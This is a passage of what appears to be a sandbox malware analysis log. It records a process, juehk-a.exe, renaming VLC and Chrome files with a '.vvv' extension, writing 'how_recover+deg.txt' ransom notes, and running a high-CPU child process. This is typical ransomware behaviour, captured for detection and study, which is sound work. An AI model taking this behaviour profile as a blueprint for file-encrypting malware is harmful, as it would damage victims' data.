34821.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\shuffle.png
34822.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\shuffle.png.vvv
34823.            ads:
34824.          fid (ads:): 562949953517744
34825.          ntstatus: 0x0
34826.          CreateOptions: 0x0
34827.        file:
34828.          timestamp: 105389
34829.          mode: rename
34830.          sequenceNumber: 2440
34831.          filesize: 510
34832.          processinfo:
34833.            pid: 1648
34834.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34836.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_bar.png
34837.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_bar.png.vvv
34838.            ads:
34839.          fid (ads:): 562949953517745
34840.          ntstatus: 0x0
34841.          CreateOptions: 0x0
34842.        file:
34843.          timestamp: 105397
34844.          mode: rename
34845.          sequenceNumber: 2441
34846.          filesize: 510
34847.          processinfo:
34848.            pid: 1648
34849.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34850.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34851.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_left.png
34852.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_left.png.vvv
34853.            ads:
34854.          fid (ads:): 562949953517746
34855.          ntstatus: 0x0
34856.          CreateOptions: 0x0
34857.        file:
34858.          timestamp: 105405
34859.          mode: rename
34860.          sequenceNumber: 2442
34861.          filesize: 526
34862.          processinfo:
34863.            pid: 1648
34864.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34865.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34866.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_point.png
34867.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_point.png.vvv
34868.            ads:
34869.          fid (ads:): 562949953517747
34870.          ntstatus: 0x0
34871.          CreateOptions: 0x0
34872.        file:
34873.          timestamp: 105414
34874.          mode: rename
34875.          sequenceNumber: 2443
34876.          filesize: 510
34877.          processinfo:
34878.            pid: 1648
34879.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34880.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34881.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_right.png
34882.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_right.png.vvv
34883.            ads:
34884.          fid (ads:): 562949953517748
34885.          ntstatus: 0x0
34886.          CreateOptions: 0x0
34887.        file:
34888.          timestamp: 105422
34889.          mode: rename
34890.          sequenceNumber: 2444
34891.          filesize: 526
34892.          processinfo:
34893.            pid: 1648
34894.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34896.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slow.png
34897.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slow.png.vvv
34898.            ads:
34899.          fid (ads:): 562949953517749
34900.          ntstatus: 0x0
34901.          CreateOptions: 0x0
34902.        file:
34903.          timestamp: 105430
34904.          mode: rename
34905.          sequenceNumber: 2445
34906.          filesize: 622
34907.          processinfo:
34908.            pid: 1648
34909.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34911.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\snapshot.png
34912.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\snapshot.png.vvv
34913.            ads:
34914.          fid (ads:): 562949953517750
34915.          ntstatus: 0x0
34916.          CreateOptions: 0x0
34917.        file:
34918.          timestamp: 105438
34919.          mode: rename
34920.          sequenceNumber: 2446
34921.          filesize: 526
34922.          processinfo:
34923.            pid: 1648
34924.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34926.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sort.png
34927.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sort.png.vvv
34928.            ads:
34929.          fid (ads:): 562949953517751
34930.          ntstatus: 0x0
34931.          CreateOptions: 0x0
34932.        file:
34933.          timestamp: 105445
34934.          mode: rename
34935.          sequenceNumber: 2447
34936.          filesize: 526
34937.          processinfo:
34938.            pid: 1648
34939.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34940.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34941.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sout.png
34942.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sout.png.vvv
34943.            ads:
34944.          fid (ads:): 562949953517752
34945.          ntstatus: 0x0
34946.          CreateOptions: 0x0
34947.        file:
34948.          timestamp: 105453
34949.          mode: rename
34950.          sequenceNumber: 2448
34951.          filesize: 590
34952.          processinfo:
34953.            pid: 1648
34954.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34956.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker.png
34957.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker.png.vvv
34958.            ads:
34959.          fid (ads:): 562949953517753
34960.          ntstatus: 0x0
34961.          CreateOptions: 0x0
34962.        file:
34963.          timestamp: 105461
34964.          mode: rename
34965.          sequenceNumber: 2449
34966.          filesize: 750
34967.          processinfo:
34968.            pid: 1648
34969.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34970.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34971.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker_mute.png
34972.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker_mute.png.vvv
34973.            ads:
34974.          fid (ads:): 562949953517754
34975.          ntstatus: 0x0
34976.          CreateOptions: 0x0
34977.        file:
34978.          timestamp: 105469
34979.          mode: rename
34980.          sequenceNumber: 2450
34981.          filesize: 510
34982.          processinfo:
34983.            pid: 1648
34984.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34986.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\stop.png
34987.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\stop.png.vvv
34988.            ads:
34989.          fid (ads:): 562949953517755
34990.          ntstatus: 0x0
34991.          CreateOptions: 0x0
34992.        file:
34993.          timestamp: 105477
34994.          mode: rename
34995.          sequenceNumber: 2451
34996.          filesize: 526
34997.          processinfo:
34998.            pid: 1648
34999.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35000.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35001.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_down.png
35002.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_down.png.vvv
35003.            ads:
35004.          fid (ads:): 562949953517756
35005.          ntstatus: 0x0
35006.          CreateOptions: 0x0
35007.        file:
35008.          timestamp: 105486
35009.          mode: rename
35010.          sequenceNumber: 2452
35011.          filesize: 542
35012.          processinfo:
35013.            pid: 1648
35014.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35015.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35016.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_up.png
35017.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_up.png.vvv
35018.            ads:
35019.          fid (ads:): 562949953517757
35020.          ntstatus: 0x0
35021.          CreateOptions: 0x0
35022.        file:
35023.          timestamp: 105496
35024.          mode: rename
35025.          sequenceNumber: 2453
35026.          filesize: 494
35027.          processinfo:
35028.            pid: 1648
35029.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35030.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35031.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white.png
35032.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white.png.vvv
35033.            ads:
35034.          fid (ads:): 562949953517758
35035.          ntstatus: 0x0
35036.          CreateOptions: 0x0
35037.        file:
35038.          timestamp: 105503
35039.          mode: rename
35040.          sequenceNumber: 2454
35041.          filesize: 526
35042.          processinfo:
35043.            pid: 1648
35044.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35045.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35046.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white_cross_small.png
35047.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white_cross_small.png.vvv
35048.            ads:
35049.          fid (ads:): 562949953517759
35050.          ntstatus: 0x0
35051.          CreateOptions: 0x0
35052.        file:
35053.          timestamp: 105526
35054.          mode: rename
35055.          sequenceNumber: 2455
35056.          filesize: 43630
35057.          processinfo:
35058.            pid: 1648
35059.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35060.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35061.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\functions.js
35062.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\functions.js.vvv
35063.            ads:
35064.          fid (ads:): 562949953517761
35065.          ntstatus: 0x0
35066.          CreateOptions: 0x0
35067.        file:
35068.          timestamp: 105566
35069.          mode: rename
35070.          sequenceNumber: 2456
35071.          filesize: 31742
35072.          processinfo:
35073.            pid: 1648
35074.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35075.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35076.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\vlm.js
35077.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\vlm.js.vvv
35078.            ads:
35079.          fid (ads:): 562949953517762
35080.          ntstatus: 0x0
35081.          CreateOptions: 0x0
35082.        file:
35083.          timestamp: 105595
35084.          mode: rename
35085.          sequenceNumber: 2457
35086.          filesize: 5454
35087.          processinfo:
35088.            pid: 1648
35089.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35090.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35091.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\style.css
35092.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\style.css.vvv
35093.            ads:
35094.          fid (ads:): 562949953517722
35095.          ntstatus: 0x0
35096.          CreateOptions: 0x0
35097.        file:
35098.          timestamp: 105681
35099.          mode: rename
35100.          sequenceNumber: 2458
35101.          filesize: 5902
35102.          processinfo:
35103.            pid: 1648
35104.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35105.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35106.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt
35107.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.vvv
35108.            ads:
35109.          fid (ads:): 562949953517764
35110.          ntstatus: 0x0
35111.          CreateOptions: 0x0
35112.        file:
35113.          timestamp: 105883
35114.          mode: rename
35115.          sequenceNumber: 2459
35116.          filesize: 142974
35117.          processinfo:
35118.            pid: 1648
35119.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35121.          old_name: C:\Program Files\VideoLAN\VLC\NEWS.txt
35122.          new_name: C:\Program Files\VideoLAN\VLC\NEWS.txt.vvv
35123.            ads:
35124.          fid (ads:): 1125899906934895
35125.          ntstatus: 0x0
35126.          CreateOptions: 0x0
35127.        file:
35128.          timestamp: 106299
35129.          mode: rename
35130.          sequenceNumber: 2460
35131.          filesize: 3246
35132.          processinfo:
35133.            pid: 1648
35134.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35135.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35136.          old_name: C:\Program Files\VideoLAN\VLC\README.txt
35137.          new_name: C:\Program Files\VideoLAN\VLC\README.txt.vvv
35138.            ads:
35139.          fid (ads:): 1407374883645552
35140.          ntstatus: 0x0
35141.          CreateOptions: 0x0
35142.        file:
35143.          timestamp: 106339
35144.          mode: rename
35145.          sequenceNumber: 2461
35146.          filesize: 11054
35147.          processinfo:
35148.            pid: 1648
35149.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35150.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35151.          old_name: C:\Program Files\VideoLAN\VLC\sdk\activex\README.TXT
35152.          new_name: C:\Program Files\VideoLAN\VLC\sdk\activex\README.TXT.vvv
35153.            ads:
35154.          fid (ads:): 562949953517621
35155.          ntstatus: 0x0
35156.          CreateOptions: 0x0
35157.        file:
35158.          timestamp: 106534
35159.          mode: rename
35160.          sequenceNumber: 2462
35161.          filesize: 6062
35162.          processinfo:
35163.            pid: 1648
35164.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35165.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35166.          old_name: C:\Program Files\VideoLAN\VLC\THANKS.txt
35167.          new_name: C:\Program Files\VideoLAN\VLC\THANKS.txt.vvv
35168.            ads:
35169.          fid (ads:): 1688849860356209
35170.          ntstatus: 0x0
35171.          CreateOptions: 0x0
35172.        apicall:
35173.          timestamp: 113414
35174.          repeat: 20000
35175.          sequenceNumber: 2463
35176.          processinfo:
35177.            pid: 1648
35178.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35179.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35180.          dllname: kernel32.dll
35181.          apiname: Sleep
35182.          address: 0x0041ed5b
35183.        process:
35184.          timestamp: 113475
35185.          mode: opened
35186.          sequenceNumber: 2464
35187.          desiredaccess: 0x02000030
35188.          ntstatus: 0xc0000022
35189.          target:
35190.            processinfo:
35191.              pid: 4
35192.              tid: 0
35193.              imagepath: N/A
35194.          source:
35195.            processinfo:
35196.              pid: 1648
35197.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35198.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35199.        high_cpu:
35200.          timestamp: 117766
35201.          sequenceNumber: 2465
35202.          total_cpu: 91.790996938384993
35203.          processinfo:
35204.            tainted: true
35205.            pid: 2312
35206.            process_cpu: 91.790996938384993
35207.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
35208.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35209.        file:
35210.          timestamp: 133173
35211.          repeat: 10000
35212.          mode: close
35213.          sequenceNumber: 2466
35214.          value: C:\Symbols\mfvdsp.pdb\how_recover+deg.txt
35215.          filesize: 2673
35216.          processinfo:
35217.            pid: 1648
35218.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35219.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35220.            ads:
35221.          fid (ads:): 562949953530414
35222.          ntstatus: 0x0
35223.          CreateOptions: 0x0
35224.        file:
35225.          timestamp: 135003
35226.          repeat: 10000
35227.          mode: created
35228.          sequenceNumber: 2467
35229.          value: C:\Symbols\microsoft.web.services.dpws.pdb\how_recover+deg.txt
35230.          processinfo:
35231.            pid: 1648
35232.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35233.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35234.            ads:
35235.          fid (ads:): 562949953530959
35236.          ntstatus: 0x0
35237.          CreateOptions: 0x60
35238.        high_cpu:
35239.          timestamp: 136464
35240.          sequenceNumber: 2468
35241.          total_cpu: 88.636295648795652
35242.          processinfo:
35243.            tainted: true
35244.            pid: 2312
35245.            process_cpu: 88.636295648795652
35246.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
35247.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35248.        apicall:
35249.          timestamp: 137857
35250.          repeat: 30000
35251.          sequenceNumber: 2469
35252.          processinfo:
35253.            pid: 1648
35254.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35255.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35256.          dllname: kernel32.dll
35257.          apiname: Sleep
35258.          address: 0x0041ed5b
35259.        process:
35260.          timestamp: 137922
35261.          mode: opened
35262.          sequenceNumber: 2470
35263.          desiredaccess: 0x02000030
35264.          ntstatus: 0xc0000022
35265.          target:
35266.            processinfo:
35267.              pid: 4
35268.              tid: 0
35269.              imagepath: N/A
35270.          source:
35271.            processinfo:
35272.              pid: 1648
35273.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35274.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35275.        high_cpu:
35276.          timestamp: 154114
35277.          sequenceNumber: 2471
35278.          total_cpu: 80.596890547263683
35279.          processinfo:
35280.            tainted: true
35281.            pid: 2312
35282.            process_cpu: 80.596890547263683
35283.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
35284.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35285.        file:
35286.          timestamp: 155888
35287.          mode: rename
35288.          sequenceNumber: 2472
35289.          filesize: 1174638
35290.          processinfo:
35291.            pid: 1648
35292.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35293.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35294.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_100_percent.pak
35295.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_100_percent.pak.vvv
35296.            ads:
35297.          fid (ads:): 1407374883636578
35298.          ntstatus: 0x0
35299.          CreateOptions: 0x0
35300.        file:
35301.          timestamp: 155972
35302.          mode: rename
35303.          sequenceNumber: 2473
35304.          filesize: 1700254
35305.          processinfo:
35306.            pid: 1648
35307.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35308.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35309.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_200_percent.pak
35310.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_200_percent.pak.vvv
35311.            ads:
35312.          fid (ads:): 1407374883636579
35313.          ntstatus: 0x0
35314.          CreateOptions: 0x0
35315.        apicall:
35316.          timestamp: 177756
35317.          repeat: 40000
35318.          sequenceNumber: 2474
35319.          processinfo:
35320.            pid: 1648
35321.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35322.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35323.          dllname: kernel32.dll
35324.          apiname: Sleep
35325.          address: 0x0041ed5b
35326.        process:
35327.          timestamp: 178617
35328.          mode: opened
35329.          sequenceNumber: 2475
35330.          desiredaccess: 0x02000030
35331.          ntstatus: 0xc0000022
35332.          target:
35333.            processinfo:
35334.              pid: 4
35335.              tid: 0
35336.              imagepath: N/A
35337.          source:
35338.            processinfo:
35339.              pid: 1648
35340.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35341.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35342.        file:
35343.          timestamp: 187379
35344.          mode: rename
35345.          sequenceNumber: 2476
35346.          filesize: 156030590
35347.          processinfo:
35348.            pid: 1648
35349.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35350.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35351.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Installer\chrome.7z
35352.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Installer\chrome.7z.vvv
35353.            ads:
35354.          fid (ads:): 1688849860347110
35355.          ntstatus: 0x0
35356.          CreateOptions: 0x0
35357.        file:
35358.          timestamp: 187804
35359.          mode: rename
35360.          sequenceNumber: 2477
35361.          filesize: 383166
35362.          processinfo:
35363.            pid: 1648
35364.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35366.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\am.pak
35367.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\am.pak.vvv
35368.            ads:
35369.          fid (ads:): 1407374883636573
35370.          ntstatus: 0x0
35371.          CreateOptions: 0x0
35372.        file:
35373.          timestamp: 187818
35374.          mode: rename
35375.          sequenceNumber: 2478
35376.          filesize: 370062
35377.          processinfo:
35378.            pid: 1648
35379.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35380.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35381.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ar.pak
35382.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ar.pak.vvv
35383.            ads:
35384.          fid (ads:): 1407374883636574
35385.          ntstatus: 0x0
35386.          CreateOptions: 0x0
35387.        file:
35388.          timestamp: 187849
35389.          mode: rename
35390.          sequenceNumber: 2479
35391.          filesize: 461230
35392.          processinfo:
35393.            pid: 1648
35394.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35396.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bg.pak
35397.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bg.pak.vvv
35398.            ads:
35399.          fid (ads:): 1407374883636575
35400.          ntstatus: 0x0
35401.          CreateOptions: 0x0
35402.        file:
35403.          timestamp: 187870
35404.          mode: rename
35405.          sequenceNumber: 2480
35406.          filesize: 587214
35407.          processinfo:
35408.            pid: 1648
35409.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35411.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bn.pak
35412.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bn.pak.vvv
35413.            ads:
35414.          fid (ads:): 1407374883636576
35415.          ntstatus: 0x0
35416.          CreateOptions: 0x0
35417.        file:
35418.          timestamp: 187901
35419.          mode: rename
35420.          sequenceNumber: 2481
35421.          filesize: 278318
35422.          processinfo:
35423.            pid: 1648
35424.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35425.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35426.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ca.pak
35427.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ca.pak.vvv
35428.            ads:
35429.          fid (ads:): 1407374883636577
35430.          ntstatus: 0x0
35431.          CreateOptions: 0x0
35432.        file:
35433.          timestamp: 187944
35434.          mode: rename
35435.          sequenceNumber: 2482
35436.          filesize: 277806
35437.          processinfo:
35438.            pid: 1648
35439.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35441.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\cs.pak
35442.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\cs.pak.vvv
35443.            ads:
35444.          fid (ads:): 1407374883636580
35445.          ntstatus: 0x0
35446.          CreateOptions: 0x0
35447.        file:
35448.          timestamp: 187959
35449.          mode: rename
35450.          sequenceNumber: 2483
35451.          filesize: 252862
35452.          processinfo:
35453.            pid: 1648
35454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35456.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\da.pak
35457.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\da.pak.vvv
35458.            ads:
35459.          fid (ads:): 1407374883636581
35460.          ntstatus: 0x0
35461.          CreateOptions: 0x0
35462.        file:
35463.          timestamp: 187975
35464.          mode: rename
35465.          sequenceNumber: 2484
35466.          filesize: 238974
35467.          processinfo:
35468.            pid: 1648
35469.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35471.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\de.pak
35472.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\de.pak.vvv
35473.            ads:
35474.          fid (ads:): 1407374883636582
35475.          ntstatus: 0x0
35476.          CreateOptions: 0x0
35477.        file:
35478.          timestamp: 188010
35479.          mode: rename
35480.          sequenceNumber: 2485
35481.          filesize: 504190
35482.          processinfo:
35483.            pid: 1648
35484.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35485.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35486.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\el.pak
35487.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\el.pak.vvv
35488.            ads:
35489.          fid (ads:): 1407374883636583
35490.          ntstatus: 0x0
35491.          CreateOptions: 0x0
35492.        file:
35493.          timestamp: 188025
35494.          mode: rename
35495.          sequenceNumber: 2486
35496.          filesize: 232446
35497.          processinfo:
35498.            pid: 1648
35499.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35501.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-GB.pak
35502.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-GB.pak.vvv
35503.            ads:
35504.          fid (ads:): 1125899906927884
35505.          ntstatus: 0x0
35506.          CreateOptions: 0x0
35507.        file:
35508.          timestamp: 188042
35509.          mode: rename
35510.          sequenceNumber: 2487
35511.          filesize: 232382
35512.          processinfo:
35513.            pid: 1648
35514.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35516.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-US.pak
35517.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-US.pak.vvv
35518.            ads:
35519.          fid (ads:): 1125899906927885
35520.          ntstatus: 0x0
35521.          CreateOptions: 0x0
35522.        file:
35523.          timestamp: 188064
35524.          mode: rename
35525.          sequenceNumber: 2488
35526.          filesize: 278094
35527.          processinfo:
35528.            pid: 1648
35529.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35530.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35531.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es-419.pak
35532.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es-419.pak.vvv
35533.            ads:
35534.          fid (ads:): 1125899906927886
35535.          ntstatus: 0x0
35536.          CreateOptions: 0x0
35537.        file:
35538.          timestamp: 188160
35539.          mode: rename
35540.          sequenceNumber: 2489
35541.          filesize: 283390
35542.          processinfo:
35543.            pid: 1648
35544.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35545.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35546.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es.pak
35547.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es.pak.vvv
35548.            ads:
35549.          fid (ads:): 1125899906927910
35550.          ntstatus: 0x0
35551.          CreateOptions: 0x0
35552.        file:
35553.          timestamp: 188232
35554.          mode: rename
35555.          sequenceNumber: 2490
35556.          filesize: 243566
35557.          processinfo:
35558.            pid: 1648
35559.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35560.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35561.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\et.pak
35562.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\et.pak.vvv
35563.            ads:
35564.          fid (ads:): 1125899906927911
35565.          ntstatus: 0x0
35566.          CreateOptions: 0x0
35567.        file:
35568.          timestamp: 188354
35569.          mode: rename
35570.          sequenceNumber: 2491
35571.          filesize: 394222
35572.          processinfo:
35573.            pid: 1648
35574.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35576.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fa.pak
